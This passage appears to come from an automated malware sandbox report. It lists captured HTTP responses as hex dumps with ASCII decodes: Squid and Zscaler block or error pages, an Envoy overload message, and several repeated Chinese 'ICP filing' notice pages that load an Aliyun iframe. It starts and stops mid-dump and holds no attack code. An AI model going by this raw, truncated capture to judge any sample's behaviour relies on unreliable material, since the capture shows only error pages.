74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:29 GMTContent-Type: text/html;charset=utf-8Content-Length: 3832X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:29 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: Content-Type,AccessToken,X-CSRF-Token, Authorization, TokenAccess-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE,UPDATEAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-TypeContent-Type: text/plain; charset=utf-8Set-Cookie: uuid=94690398-de0e-11ee-9749-fa20201ff994; Path=/; Max-Age=8640000; HttpOnlyX-Content-Type-Options: nosniffDate: Sat, 09 Mar 2024 12:14:29 GMTContent-Length: 31Data Raw: 75 6e 73 75 70 70 6f 72 74 65 64 20 70 72 6f 74 6f 63 6f 6c 20 73 63 68 65 6d 65 20 22 22 0a Data Ascii: unsupported protocol scheme ""
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:29 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlServer: Zscaler/6.2Cache-Control: no-cacheAccess-Control-Allow-Origin: *Content-length: 13597Data Raw: 3c 21 2d 2d 23 20 49 64 3a 20 63 6c 6f 73 65 64 70 72 6f 78 79 2e 68 74 6d 6c 20 32 38 35 31 34 34 20 32 30 32 31 2d 30 36 2d 31 36 20 30 35 3a 30 32 3a 30 36 5a 20 73 7a 68 61 6e 67 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 63 2e 6f 72 67 2f 54 52 2f 31 39 39 39 2f 52 45 43 2d 68 74 6d 6c 34 30 31 2d 31 39 39 39 31 32 32 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 73 63 61 6c 65 72 20 6d 61 6b 65 73 20 74 68 65 20 69 6e 74 65 72 6e 65 74 20 73 61 66 65 20 66 6f 72 20 62 75 73 69 6e 65 73 73 65 73 20 62 79 20 70 72 6f 74 65 63 74 69 6e 67 20 74 68 65 69 72 20 65 6d 70 6c 6f 79 65 65 73 20 66 72 6f 6d 20 6d 61 6c 77 61 72 65 2c 20 76 69 72 75 73 65 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 73 65 63 75 72 69 74 79 20 74 68 72 65 61 74 73 2e 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 74 69 74 6c 65 3e 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 62 79 20 5a 73 63 61 6c 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 76 61 72 20 64 65 66 4c 61 6e 67 20 3d 20 27 65 6e 5f 55 53 27 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 69 6d 67 20 61 6c 74 3d 22 5a 73 63 61 6c 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 7a 73 63 6c 6f 75 64 2e 6e 65 74 2f 69 6d 67 5f 6c 6f 67 6f 5f 6e 65 77 31 2e 70 6e 67 22 3e 2d 2d 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 33 65 33 65 33 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0a 63 6f 6c 6f 72 3a 23 34 42 34 46 35 34 3b 0a 7d 0a 61 20 7b 0a 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 63 6f 6c 6f 72 3a 23 30 30 39 64 64 30 3b 0a 7d 0a 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0a 7d 0a 74 64 20 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 7d 0a 69 6d 67 20 7b 0a 6d
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:29 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service Unavailablex-envoy-overloaded: truecontent-length: 81content-type: text/plaindate: Sat, 09 Mar 2024 11:54:18 GMTserver: svcproxyconnection: closeData Raw: 75 70 73 74 72 65 61 6d 20 63 6f 6e 6e 65 63 74 20 65 72 72 6f 72 20 6f 72 20 64 69 73 63 6f 6e 6e 65 63 74 2f 72 65 73 65 74 20 62 65 66 6f 72 65 20 68 65 61 64 65 72 73 2e 20 72 65 73 65 74 20 72 65 61 73 6f 6e 3a 20 6f 76 65 72 66 6c 6f 77 Data Ascii: upstream connect error or disconnect/reset before headers. reset reason: overflow
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 